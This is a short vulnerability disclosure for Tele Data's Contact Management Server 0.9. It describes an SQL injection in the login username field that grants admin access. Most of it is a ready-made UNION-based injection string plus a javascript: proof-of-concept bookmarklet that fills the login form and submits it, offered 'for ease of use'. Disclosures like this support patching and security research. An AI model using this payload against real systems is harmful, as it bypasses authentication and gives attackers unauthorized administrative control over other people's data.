Tele Data's CMS version 0.9 suffers from a remote SQL injection vulnerability.
4c34f67555fc70368e4139fb4d22613428c7d1dcbf726225359040eb6bda3ba3
|=================================================================================================|
| ___ ___ ___ ___ ___ ___ |
| /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ |
| /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ |
| /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ |
| /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ |
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |
| \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / |
| \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / |
| \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ |
| \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | |
| \/__/ \/__/ \/__/ \/__/ \|__| |
| |
|=================================================================================================|
| |
| Vulnerability............SQL Injection |
| Software.................Tele Data's Contact Management Server 0.9 |
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe |
| Date.....................4/28/10 |
| |
|=================================================================================================|
| |
| Site.....................http://cross-site-scripting.blogspot.com/ |
| Email....................john.leitch5@gmail.com |
| |
|=================================================================================================|
|
| ##Description##
|
| There isn't much in the way of security here. It's possible to log in with admin priviledges by
| injecting SQL into the username field. As there are client side length contstraints in place for
| the username field I packaged the exploit in some javascript for ease of use.
|
|
| ##Exploit##
|
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--
|
|
| ##Proof of Concept##
|
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
|
|=================================================================================================|